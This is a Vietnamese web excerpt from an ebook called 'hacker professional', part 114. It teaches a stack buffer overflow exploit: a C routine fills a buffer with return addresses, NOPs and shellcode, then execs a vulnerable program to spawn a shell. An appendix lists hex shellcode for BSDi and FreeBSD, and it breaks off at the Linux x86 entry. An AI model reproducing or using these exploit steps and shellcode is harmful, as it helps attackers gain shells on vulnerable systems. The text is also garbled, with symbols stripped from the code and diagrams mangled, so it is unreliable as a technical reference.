Tham khảo tài liệu 'hacker professional ebook part 114', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | I ebp 2 I I ------------- I I I I I buffer của I vulnerable I I I ------------- Chúng ta cần làm tràn buffer của vulnerable để return addr 2 trỏ đến đâu đó trong buffer . Cũng như ví dụ 1- bạn hãy xem lại thật kĩ ví dụ 1 chúng ta sẽ tạo một vùng nhớ trên heap if buffer malloc bsize printf Khong the cap phat bo exit -1 A Bây giờ lắp đầy buffer bằng địa chỉ trở về mà chúng ta đã tính được ptr buffer addr_ptr long ptr for i 0 i addr_ptr ret Tiếp theo chúng ta sẽ lắp đầy 1 2 buffer bằng NOPs for i 0 i buffer i NOP Sau đó chúng ta đặt shellcode vào giữa NOPs ptr buffer bsize 2 - strlen shellcode 2 for i 0 i ptr shellcode i Cuối cùng đặt vào buffer để hàm strcpy trong vulnerable biết đã hết data cần copy. buffer bsize-1 0 Tiến hành làm tràn bộ đệm của vulnerable bạn sẽ có được shell lệnh do vulnerable spawn. execl . vulnerable vulnerable buffer 0 Quan sát stack buffer của vulnerable và return addr 2 sau khi tràn bộ đệm sẽ có dạng như sau ---------- return addr2 -- --------- 1 1ebP 2 11 ------------ I I I I 1noP 1 1 I shellcode I I InoP I I I nop I I nop I I I --------- Chúng ta hi vọng rằng return addr 2 sẽ trỏ đến 1 nop trước shellcode. Các câu lệnh NOPs sẽ không làm gì hết đến khi gặp shellcode shellcode sẽ đổ shell lệnh cho chúng ta bạn hãy xem lại phần Hình dung cách đặt shellcode trên stack . Phụ lục Các loại shellcode BSDi char code xebx57x5ex31xdbx83xc3x08x83xc3x02x88x5e x26x31xdbx83xc3x23x83xc3x23x88x5exa8x31 xdbx83xc3x26x83xc3x30x88x5exc2x31xc0x88 x46x0bx89xf3x83xc0x05x31xc9x83xc1x01x31 xd2xcdx80x89xc3x31xc0x83xc0x04x31xd2x88 x56x27x89xf1x83xc1x0cx83xc2x1bxcdx80x31 xc0x83xc0x06xcdx80x31xc0x83xc0x01xcdx80 BIN SH FreeBSD char code xebx37x5ex31xc0x88x46xfax89x46xf5x89x36x89x76 x04x89x76x08x83x06x10x83x46x04x18x83x46x08x1b x89x46x0cx88x46x17x88x46x1ax88x46x1dx50x56xff x36xb0x3bx50x90x9ax01x01x01x01x07x07xe8xc4xff xffxffx02x02x02x02x02x02x02x02x02x02x02x02x02 x02x02x02 bin Replace .sh with .anycommand Linux x86 char shellcode .
